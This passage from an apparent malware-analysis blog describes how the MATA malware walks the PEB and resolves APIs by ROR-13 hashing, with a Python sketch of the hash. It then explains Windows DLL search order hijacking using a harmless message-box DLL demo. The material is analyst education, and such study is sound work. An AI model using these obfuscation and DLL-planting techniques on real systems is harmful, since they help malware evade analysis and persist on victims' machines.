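        self.flink = self  # an empty list points at itself
        self.blink = self


def insert_tail(head, entry):
    """Link `entry` in front of the head, i.e. at the end of the list."""
    last = head.blink
    last.flink = entry
    entry.blink = last
    entry.flink = head
    head.blink = entry


def walk(head):
    """Collect module names until the walk wraps around to the head."""
    names = []
    node = head.flink
    while node is not head:
        names.append(node.name)
        node = node.flink
    return names


head = Entry()
for module in ["poc.exe", "ntdll.dll", "kernel32.dll"]:
    insert_tail(head, Entry(module))

for name in walk(head):
    print(f"[+] {name}")
```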

Finally, we want to take a look at a real world example of how PEB can be abused.

How the MATA Framework abuses PEB

This use case was introduced to me while reverse engineering a Windows variant of the MATA Framework. According to Kaspersky[1], the MATA Framework is used by the Lazarus group and targets multiple platforms.

Malware authors have a high interest in obfuscation, because it increases the time needed to reverse engineer it. One way to hide API calls is to use API Hashing. I have written about Danabot’s API Hashing[2] before and how to overcome it. MATA also uses this technique.

However instead of using the WIN API calls to retrieve the address of DLLs loaded into memory, MATA abuses the Process Environment Block to fetch base addresses. Let’s take a look at how MATA for Windows achieves this:

MATA API Hashing

The input of the APIHashing method takes an integer as the only parameter, this is the hash for the corresponding API call.

Figure 1: Call to APIHash method

Right after the prologue, it retrieves a pointer to PEB by reading it from the Thread Environment Block via the segment register GS. Similar to our proof of concept above, MATA now fetches the address to the head of the linked list provided by InMemoryOrderModuleList. Each item of the linked list provides the DLL base address of the corresponding loaded module.

From there, the malware reads the e_lfanew field, which contains the offset to the PE header. By adding the base address, e_lfanew and 0x88, it jumps directly to the data directories of the corresponding PE. From the data directories, MATA accesses the exported function names in a similar way as I’ve described in my blog article about DanaBot’s API Hashing[3]. The hashing algorithm is fairly simple. The character codes of the name are added to the hash one by one, and after each addition the result is rotated right (ROR) by 0xD. If the final hash matches the input parameter, the address of the function is retrieved. The following figure explains the function at a high level:

High level overview of API Hashing of MATA malware
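The hashing step described above can be sketched in Python as follows. I assume a 32-bit hash and the order "add the character, then rotate", as in the description. The exact details in MATA (initial value, handling of the terminating null byte, casing) may differ, and the export list is made up for the example.

```python
"""Additive ROR-13 style API hash (sketch under stated assumptions)."""


def ror32(value, count):
    """Rotate a 32-bit value right by `count` bits."""
    count %= 32
    value &= 0xFFFFFFFF
    return ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF


def api_hash(name):
    """Add each character code, then rotate the result right by 0xD."""
    result = 0
    for char in name.encode("ascii"):
        result = ror32((result + char) & 0xFFFFFFFF, 0xD)
    return result


def resolve(wanted, exports):
    """Return the export name whose hash matches, or None."""
    for name in exports:
        if api_hash(name) == wanted:
            return name
    return None


# Hypothetical export names for demonstration purposes
EXPORTS = ["CreateFileA", "LoadLibraryA", "VirtualAlloc"]
target = api_hash("LoadLibraryA")
print(f"[+] {target:#010x} resolves to {resolve(target, EXPORTS)}")
```

As an analyst, you can precompute such hashes for all exports of the common system DLLs and look up the constants you find in the sample.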

Learning from each other

That’s it with the blog article, I hope you enjoyed it! There are probably way more use cases and real world cases of how the PEB is and can be abused. If you can think of another one, feel free to leave a comment below and share it, so that we can learn from each other!

The DLL Search Order And Hijacking It

10 November 2021 at 07:52

If you ever used Process Monitor to track activity of a process, you might have encountered the following pattern:

Figure 1: Example of dnsapi.dll not being found in the application directory

The image above is a snippet from events captured by Process Monitor during the execution of x32dbg.exe on Windows 7. DNSAPI.DLL and IPHLPAPI.DLL reside in the System directory, so you might ask yourself:

Why would Windows try to search for either of these DLLs in the application directory first?

Operating systems are very complex, and so is the challenge of implementing a fault-tolerant system to search for dependencies such as dynamic link libraries. Today, we’ll talk about DLL Search Order and DLL Search Order Hijacking, in particular how it works and how adversaries can abuse it.

DLL Search Order

First, we have to talk about what happens when a PE File is executed on the Windows system.

The majority of native binaries you encounter on Windows are dynamically linked. This means that at the start of execution, the loader uses information embedded inside the binary to locate the DLLs that are essential for the process. In contrast to a statically linked binary, a dynamically linked executable uses the libraries provided by the OS instead of having them compiled into the executable itself.

Before the dynamically linked executable can use or load these libraries, it will have to know where these dependencies are persisted on disk or if they are already in memory. This is where the DLL Search Order makes its appearance. To keep it simple, we will focus only on Windows Desktop Applications.

Pre-Checks and In-Memory Search

Before the Windows OS starts searching for the needed DLL on disk, it will first attempt to find the needed module in memory. If a DLL is already in memory, it will not be loaded again. Now this part is a little bit complicated and out of scope for this blog article, as we would have to define what “loaded” even means. If you are interested in the details of this first check, I advise you to look up the official Microsoft documentation[1].

If the memory check fails, Windows can fall back to a list of known DLLs. If the needed library is part of that list, it will use its copy of the known DLL. The list of known DLLs is persisted in the Windows Registry.

Figure 2: List of KnownDlls on Windows 7

On-Disk Search

If the first two checks fail, the OS will have to search for the DLL on disk. Depending on the OS settings, Windows will use a different search order. By default, Windows enables the SafeDllSearchMode feature to harden the system against DLL Search Order Hijacking attacks, a technique we will explain in the upcoming section.

The registry value controlling this feature is as follows:

  • HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\SafeDllSearchMode

Let’s take a look at the differences of the search order depending whether SafeDllSearchMode is enabled or not.

Figure 3: DLL Search Order flow

We clearly see that the current directory is prioritised if SafeDllSearchMode is disabled and this can be abused by adversaries. The art of abusing this search order flow is called DLL Search Order Hijacking.
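The on-disk part of the flow can be modelled in a few lines of Python. The sketch below follows the standard search order for desktop applications as documented by Microsoft, but works purely on strings: the directory paths, the set of "existing" files and all function names are assumptions for illustration, and the in-memory and KnownDLLs checks are left out.

```python
"""Model of the on-disk DLL search order (illustrative only)."""

SYSTEM_DIRS = [r"C:\Windows\System32", r"C:\Windows\System", r"C:\Windows"]


def search_order(app_dir, current_dir, safe_mode=True, path_dirs=()):
    """Return the directories in the order they would be searched."""
    if safe_mode:
        order = [app_dir, *SYSTEM_DIRS, current_dir]
    else:
        # Without SafeDllSearchMode the current directory moves up
        order = [app_dir, current_dir, *SYSTEM_DIRS]
    return order + list(path_dirs)


def resolve(dll_name, order, existing_files):
    """Return the first candidate path that exists, or None."""
    for directory in order:
        candidate = directory.rstrip("\\") + "\\" + dll_name
        if candidate.lower() in existing_files:
            return candidate
    return None


order = search_order(r"C:\Tools\x32dbg", r"C:\Users\me\Downloads")
files = {r"c:\windows\system32\dnsapi.dll"}
print(f"[+] Loaded from {resolve('dnsapi.dll', order, files)}")

# A DLL with the same name is planted in the application directory
files.add(r"c:\tools\x32dbg\dnsapi.dll")
print(f"[+] Loaded from {resolve('dnsapi.dll', order, files)}")
```

Note that the application directory comes first in both modes, which is why a planted DLL wins even with SafeDllSearchMode enabled.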

DLL Search Order Hijacking

Adversaries can abuse the search order flow displayed above to load their own malicious DLLs into memory instead of the legitimate ones. There are many ways this technique can be used. However, it is more effective for achieving persistence on the target system than for initial execution.

Let’s take a step back and revisit our example from above:

  • x32dbg.exe tries to load DNSAPI.DLL
  • DNSAPI.DLL is not in the list of known DLLs and is also not loaded into memory.
  • Since SafeDllSearchMode is enabled, it will fall back to the system directory if not found in the application directory

What would happen, if we craft and place a malicious DLL, named DNSAPI.DLL into the application directory?

We would be able to hijack the search order flow and force a legitimate application to load our malicious code into memory.

Practical Use Case

Let’s take a look at a simple practical example. Our application calls LoadLibraryA and tries to load dnsapi.dll, like in our example from above. Next we craft a small DLL file, which does nothing else but create a message box in the DllMain function. Once the DLL is loaded into memory, DllMain will be triggered.

In the first run, we do not place the crafted DLL in the application directory. As expected, Windows will load dnsapi.dll from the system directory:

Next, we will now name our crafted DLL dnsapi.dll and place it in the application directory:

Whoops! I think we can all think of a couple use cases of how APT groups and malware can abuse this technique to achieve persistence on the victim’s system.

Real world examples and APTs

For the sake of keeping it simple and explaining the core principles behind this persistence technique, we’ve built a very simple use case here. Of course, the real world looks a little bit different and usually attackers have to take into account:

  • Endpoint Security solutions with behaviour based detections, preventing such attacks with signatures
  • Programmatic dependencies, which won’t allow you to just replace a DLL in an application directory and hope that it will work just fine
  • and many more

However, if you never heard about this technique, I hope I was able to create some awareness for it!
